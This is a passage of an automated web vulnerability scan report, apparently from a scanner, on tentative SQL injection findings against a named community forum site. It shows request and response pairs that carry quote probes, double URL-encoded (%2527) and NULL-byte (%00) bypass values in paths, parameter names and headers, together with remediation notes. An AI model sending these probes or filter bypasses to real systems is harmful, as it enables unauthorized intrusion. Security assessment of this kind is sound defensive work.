Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:47:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Location: https://secure.skype.com/login?partner_id=b38bf07d4373f92f5932f9e2887a32e0&redirectreason=notregistered&return_url=http%3A%2F%2Fcommunity.skype.com%2Ft5%2Fnotifications%2Fnotifymoderatorpage%2Fmessage-uid%2F25246%3F1%2500%2527%2527%3D1
Content-Length: 0
Connection: close
Content-Type: text/plain


1.37. http://community.skype.com/t5/tag/Mac/tg-p/category-id/English [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Mac/tg-p/category-id/English

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag%2527/Mac/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 129995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Mac" i
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/tag%2527%2527/Mac/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.38. http://community.skype.com/t5/tag/Subscription/tg-p/category-id/English [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Subscription/tg-p/category-id/English

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 132955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Subscr
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.39. http://community.skype.com/t5/tag/Video/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Video/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/Video/tg-p/category-id/English?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/Video/tg-p/category-id/English?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Video"
...[SNIP]...

1.40. http://community.skype.com/t5/tag/call/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/call/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/tag/call/tg-p/category-id/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/call/tg-p/category-id/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "call"
...[SNIP]...

1.41. http://community.skype.com/t5/tag/crash/tg-p/category-id/English [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/crash/tg-p/category-id/English

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/crash/tg-p/category-id/English%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 35824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Node 0 was N
...[SNIP]...
<link href="http://community.skype.com/t5/errors/errorpage/tag-name/crash/tag-id/32/category-id/English%27" rel="canonical">
...[SNIP]...
<div class="exception-page-message NoSuchNodeException lia-component-content" class="exception-page-message NoSuchNodeException">
...[SNIP]...

Request 2

GET /t5/tag/crash/tg-p/category-id/English%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.42. http://community.skype.com/t5/tag/error/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/error/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/tag/error/tg-p/category-id/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/error/tg-p/category-id/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "error"
...[SNIP]...

1.43. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/spanish/tg-p/category-id/English

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "spanis
...[SNIP]...

1.44. http://community.skype.com/t5/user/viewprofilepage/user-id/165954 [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165954

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 45036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.45. http://community.skype.com/t5/user/viewprofilepage/user-id/165958 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165958

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/user/viewprofilepage'/user-id/165958 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user/viewprofilepage''/user-id/165958 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.46. http://community.skype.com/t5/user/viewprofilepage/user-id/59914 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/59914

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user%2527/viewprofilepage/user-id/59914 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user%2527%2527/viewprofilepage/user-id/59914 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.47. http://community.skype.com/t5/user/viewprofilepage/user-id/8 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/8

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user%2527/viewprofilepage/user-id/8 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user%2527%2527/viewprofilepage/user-id/8 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:36 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.48. http://community.skype.com/t5/util/componentrenderpage/component-id/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/util/componentrenderpage/component-id/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

